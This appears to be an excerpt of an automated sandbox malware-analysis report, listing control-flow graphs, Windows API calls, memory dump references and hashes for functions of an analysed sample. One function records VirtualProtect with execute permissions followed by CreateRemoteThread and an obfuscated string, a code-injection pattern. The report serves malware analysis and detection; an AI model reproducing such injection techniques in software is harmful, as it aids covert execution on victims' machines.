                                                                                                                                                                                                                                                              control_flow_graph 21 a15c5b-a15c74 22 a15c76-a15c86 call a0e5ea 21->22 23 a15c8a-a15c8f 21->23 22->23 29 a15c88 22->29 25 a15c91-a15c9b 23->25 26 a15c9e-a15cc4 call a16c56 23->26 25->26 31 a15e37-a15e48 call a067bb 26->31 32 a15cca-a15cd5 26->32 29->23 34 a15cdb-a15ce0 32->34 35 a15e2a 32->35 38 a15ce2-a15ceb call a06b50 34->38 39 a15cf5-a15d00 call a1223f 34->39 36 a15e2c 35->36 41 a15e2e-a15e35 call a0654c 36->41 46 a15d0b-a15d0f 38->46 47 a15ced-a15cf3 38->47 39->46 48 a15d02 39->48 41->31 46->36 51 a15d15-a15d2c call a16c56 46->51 50 a15d08 47->50 48->50 50->46 51->36 54 a15d32-a15d44 call a12125 51->54 56 a15d49-a15d4d 54->56 57 a15d68-a15d6a 56->57 58 a15d4f-a15d57 56->58 57->36 59 a15d91-a15d9d 58->59 60 a15d59-a15d5e 58->60 61 a15e1c 59->61 62 a15d9f-a15da1 59->62 63 a15e10-a15e12 60->63 64 a15d64-a15d66 60->64 68 a15e1e-a15e25 call a0654c 61->68 66 a15da3-a15dac call a06b50 62->66 67 a15db6-a15dc1 call a1223f 62->67 63->41 64->57 65 a15d6f-a15d89 call a12125 64->65 65->63 77 a15d8f 65->77 66->68 78 a15dae-a15db4 66->78 67->68 79 a15dc3 67->79 68->57 77->57 80 a15dc9-a15dce 78->80 79->80 80->68 81 a15dd0-a15de8 call a12125 80->81 81->68 84 a15dea-a15df1 81->84 85 a15df3-a15df4 84->85 86 a15e14-a15e1a 84->86 87 a15df5-a15e07 call a16cd2 85->87 86->87 87->68 90 a15e09-a15e0f call a0654c 87->90 90->63
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00A15CE2
                                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00A15DA3
                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00A15E0A
                                                                                                                                                                                                                                                                • Part of subcall function 00A1223F: HeapAlloc.KERNEL32(00000000,00000000,?,?,00A07345,?,?,00000000,?,?,00A011C6,-00000004,00000000,00000000,00A014FC,00000000), ref: 00A12271
                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00A15E1F
                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00A15E2F
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1096550386-0
                                                                                                                                                                                                                                                              • Opcode ID: 6e64b5994f218a4744bec10b97f9ceb846aa9fa58edca6eebe955991f58b304e
                                                                                                                                                                                                                                                              • Instruction ID: 3523c93d887dfd502ccf3077b2a56a01e9fefa68fd3a8960b620aac2c76ad339
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e64b5994f218a4744bec10b97f9ceb846aa9fa58edca6eebe955991f58b304e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3519272E00616EFEB259F74DD85EFB3AA9EF84714B150129FD04D6190E635CDA08760
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00A021B1: _strlen.LIBCMT ref: 00A021C9
                                                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(00A5AC00,000004AC,00000040,?,?,006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@), ref: 00A020F1
                                                                                                                                                                                                                                                              • CreateRemoteThread.KERNELBASE(000000FF,00000000,00000000,Function_00002057,00000000,00000000,00000000), ref: 00A02105
                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00A0210E
                                                                                                                                                                                                                                                                • Part of subcall function 00A0223E: _Deallocate.LIBCONCRT ref: 00A0224D
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • 006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@, xrefs: 00A020B8
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateDeallocateObjectProtectRemoteSingleThreadVirtualWait_strlen
                                                                                                                                                                                                                                                              • String ID: 006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@
                                                                                                                                                                                                                                                              • API String ID: 1041046508-32248209
                                                                                                                                                                                                                                                              • Opcode ID: dd91f512376d6dc4c0fa579f60e0dd8db70071d8418ad1ca83a2994ac3ed38d2
                                                                                                                                                                                                                                                              • Instruction ID: 61d913f460626e39b9447b5c57282e2086deeaabc968f5968af4a2fe2965af35
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd91f512376d6dc4c0fa579f60e0dd8db70071d8418ad1ca83a2994ac3ed38d2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C01C471A002187FE714EBE4ED4AEFF73ACFB08314B514229F912A61C1EE3499058724
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00A0F39E,?,00A0F242,00000000,?,?,00A0F39E,126C9991,?,00A0F39E), ref: 00A0F259
                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00A0F242,00000000,?,?,00A0F39E,126C9991,?,00A0F39E), ref: 00A0F260
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00A0F272
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                                                              • Opcode ID: ae2905a0de639a36a1ff534adb791eadc2add997ece92bd99bedefdaa6be69eb
                                                                                                                                                                                                                                                              • Instruction ID: 69fb27d49ce8fe6e99f2c669ddec6309f82808d15624ef397de65687077a549c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae2905a0de639a36a1ff534adb791eadc2add997ece92bd99bedefdaa6be69eb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BD09E35000648AFCF216FA0ED0D9C93F26AF48351B458030B9099A472DB319953DA50
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 114 a17ddd-a17e05 call a1790d 117 a17e0b-a17e11 114->117 118 a17fcd-a17fce call a1797e 114->118 120 a17e14-a17e1a 117->120 123 a17fd3-a17fd5 118->123 121 a17e20-a17e2c 120->121 122 a17f1c-a17f3b call a095b0 120->122 121->120 124 a17e2e-a17e34 121->124 133 a17f3e-a17f43 122->133 126 a17fd6-a17fe4 call a067bb 123->126 127 a17f14-a17f17 124->127 128 a17e3a-a17e46 IsValidCodePage 124->128 127->126 128->127 132 a17e4c-a17e53 128->132 134 a17e55-a17e61 132->134 135 a17e7b-a17e88 GetCPInfo 132->135 136 a17f80-a17f8a 133->136 137 a17f45-a17f4a 133->137 138 a17e65-a17e71 call a179e1 134->138 140 a17f08-a17f0e 135->140 141 a17e8a-a17ea9 call a095b0 135->141 136->133 139 a17f8c-a17fb6 call a178cf 136->139 142 a17f7d 137->142 143 a17f4c-a17f54 137->143 150 a17e76 138->150 154 a17fb7-a17fc6 139->154 140->118 140->127 141->138 155 a17eab-a17eb2 141->155 142->136 147 a17f75-a17f7b 143->147 148 a17f56-a17f59 143->148 147->137 147->142 149 a17f5b-a17f61 148->149 149->147 153 a17f63-a17f73 149->153 150->123 153->147 153->149 154->154 156 a17fc8 154->156 157 a17eb4-a17eb9 155->157 158 a17ede-a17ee1 155->158 156->118 157->158 160 a17ebb-a17ec3 157->160 159 a17ee6-a17eed 158->159 159->159 161 a17eef-a17f03 call a178cf 159->161 162 a17ec5-a17ecc 160->162 163 a17ed6-a17edc 160->163 161->138 164 a17ecd-a17ed4 162->164 163->157 163->158 164->163 164->164
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00A1790D: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 00A17938
                                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00A17C24,?,00000000,?,00000000,?), ref: 00A17E3E
                                                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A17C24,?,00000000,?,00000000,?), ref: 00A17E80
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 546120528-0
                                                                                                                                                                                                                                                              • Opcode ID: d7a2b7e9ebc354b3eb94903a3465ec669725bf73b6a1339230ba1303aed85e0f
                                                                                                                                                                                                                                                              • Instruction ID: aa27f22d3efce2573b55342a4ac69b1110d1fa688942f95dc12db07577dcc836
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7a2b7e9ebc354b3eb94903a3465ec669725bf73b6a1339230ba1303aed85e0f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E512271A082459EDB21CF75C881AFFBBF5EF45300F2454AED0968B292E77499C6CB90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 167 a044bb-a044db 168 a044e6-a044ed 167->168 169 a044dd-a044e4 call a044a1 167->169 171 a0450f-a04513 168->171 172 a044ef-a044f9 168->172 177 a0453b-a04549 call a067bb 169->177 174 a04515-a04524 call a04113 171->174 175 a04538 171->175 172->171 173 a044fb-a0450d 172->173 173->177 181 a04526-a0452a call a03928 174->181 182 a0454c-a04581 174->182 175->177 185 a0452f-a04533 181->185 189 a04583-a04586 182->189 190 a045a7-a045af 182->190 185->175 187 a04535 185->187 187->175 189->190 191 a04588-a0458c 189->191 192 a045b1-a045c2 call a0d45b 190->192 193 a045c8-a045d2 190->193 191->175 194 a0458e-a0459d call a03928 191->194 192->175 192->193 193->175 196 a045d8-a045db 193->196 194->175 200 a0459f-a045a5 194->200 196->177 200->175
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Fputc
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3078413507-0
                                                                                                                                                                                                                                                              • Opcode ID: 500dee25a77a715bccb0a5158638523dad51630f03b64dba3b46f6be19dbcc01
                                                                                                                                                                                                                                                              • Instruction ID: e1c7863ebdb550b152ff366594af625b119a36b406036a4140eb8494c68d9f39
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 500dee25a77a715bccb0a5158638523dad51630f03b64dba3b46f6be19dbcc01
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16418FB690021EABCF14DF64E9809EEB7B8FF0D351B544126EA01A7680EB31FD51CB90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 201 a12125-a12134 call a11c57 204 a12136-a1215b LCMapStringEx 201->204 205 a1215d-a12177 call a12182 LCMapStringW 201->205 209 a1217d-a1217f 204->209 205->209
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • LCMapStringEx.KERNELBASE(?,00A15D49,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00A12159
                                                                                                                                                                                                                                                              • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00A15D49,?,?,00000000,?,00000000), ref: 00A12177
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: String
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2568140703-0
                                                                                                                                                                                                                                                              • Opcode ID: 09f96278a6facc9c9e1982a8eac3cc880408aab74af41026bb0360212d4829f1
                                                                                                                                                                                                                                                              • Instruction ID: 0a518594baef00598b00afb327d73dcd9e273c55859bfdff68e99c9bef015cf4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09f96278a6facc9c9e1982a8eac3cc880408aab74af41026bb0360212d4829f1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0F07A3200016ABBCF129F90DD05EDE3F66EF493A0F058210FB1865120C732C9B2EB90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 210 a179e1-a17a03 211 a17a09-a17a1b GetCPInfo 210->211 212 a17b1c-a17b42 210->212 211->212 214 a17a21-a17a28 211->214 213 a17b47-a17b4c 212->213 215 a17b56-a17b5c 213->215 216 a17b4e-a17b54 213->216 217 a17a2a-a17a34 214->217 219 a17b68 215->219 220 a17b5e-a17b61 215->220 218 a17b64-a17b66 216->218 217->217 221 a17a36-a17a49 217->221 222 a17b6a-a17b7c 218->222 219->222 220->218 223 a17a6a-a17a6c 221->223 222->213 226 a17b7e-a17b8c call a067bb 222->226 224 a17a4b-a17a52 223->224 225 a17a6e-a17aa5 call a15b52 call a15e49 223->225 229 a17a61-a17a63 224->229 236 a17aaa-a17adf call a15e49 225->236 230 a17a65-a17a68 229->230 231 a17a54-a17a56 229->231 230->223 231->230 235 a17a58-a17a60 231->235 235->229 239 a17ae1-a17aeb 236->239 240 a17af9-a17afb 239->240 241 a17aed-a17af7 239->241 243 a17b09 240->243 244 a17afd-a17b07 240->244 242 a17b0b-a17b18 241->242 242->239 245 a17b1a 242->245 243->242 244->242 245->226
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(E8458D00,?,00A17C30,00A17C24,00000000), ref: 00A17A13
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Info
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1807457897-0
                                                                                                                                                                                                                                                              • Opcode ID: 01f5b23b9f909ce7f86bac617000a76900ce647f0c37ce0f57e50b76464efa03
                                                                                                                                                                                                                                                              • Instruction ID: 1122c50afeedce514ef0604a2ec22f5a3d1c6108969369d2bc383c8262ef7b5c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01f5b23b9f909ce7f86bac617000a76900ce647f0c37ce0f57e50b76464efa03
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1851497190C2589EDB218F28CD80EEE7BB8EB45704F2455E9E59AC7182D3349E86CB20
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 246 a11d56-a11d7e 247 a11d80-a11d82 246->247 248 a11d84-a11d86 246->248 249 a11dd5-a11dd8 247->249 250 a11d88-a11d8a 248->250 251 a11d8c-a11d93 call a11c8b 248->251 250->249 253 a11d98-a11d9c 251->253 254 a11dbb-a11dd2 253->254 255 a11d9e-a11dac GetProcAddress 253->255 256 a11dd4 254->256 255->254 257 a11dae-a11db9 call a0e9c9 255->257 256->249 257->256
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: bf392609c3ac7769b70eee7ecafba76ea172de0d9562576b7b25268b4ea62261
                                                                                                                                                                                                                                                              • Instruction ID: 721fda6ef834f72de36a3b416583a97389fca42c98f1234d19a96d12d7d7f4d3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf392609c3ac7769b70eee7ecafba76ea172de0d9562576b7b25268b4ea62261
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 940192336042259F9F25DB6DFD40AEA33B6EB857607144524FA05DB198EA309882C790
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 260 a1228d-a12298 261 a122a6-a122ac 260->261 262 a1229a-a122a4 260->262 264 a122c5-a122d6 RtlAllocateHeap 261->264 265 a122ae-a122af 261->265 262->261 263 a122da-a122e5 call a0bc10 262->263 270 a122e7-a122e9 263->270 266 a122b1-a122b8 call a10b67 264->266 267 a122d8 264->267 265->264 266->263 273 a122ba-a122c3 call a10bb2 266->273 267->270 273->263 273->264
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,00A11968,00000001,00000364,00000000,00000002,000000FF,?,?,00A07345,?,?,00000000), ref: 00A122CE
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                              • Opcode ID: 69f0e58fd59a66059858295ef65b9c92cf1452495109667edfc918a574f1bb3e
                                                                                                                                                                                                                                                              • Instruction ID: b39a3efea58bd6eb024fe1959b1a8bb2f4874095d68c60a91125a4e3a01a094a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69f0e58fd59a66059858295ef65b9c92cf1452495109667edfc918a574f1bb3e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7FF0E9315042286BEB316B669E01FDE3758AF857A0F148021EC04A6590CB70DCF143E0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,00A1A992,00000002,00000000,?,?,?,00A1A992,?,00000000), ref: 00A1A70D
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,00A1A992,00000002,00000000,?,?,?,00A1A992,?,00000000), ref: 00A1A736
                                                                                                                                                                                                                                                              • GetACP.KERNEL32(?,?,00A1A992,?,00000000), ref: 00A1A74B
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
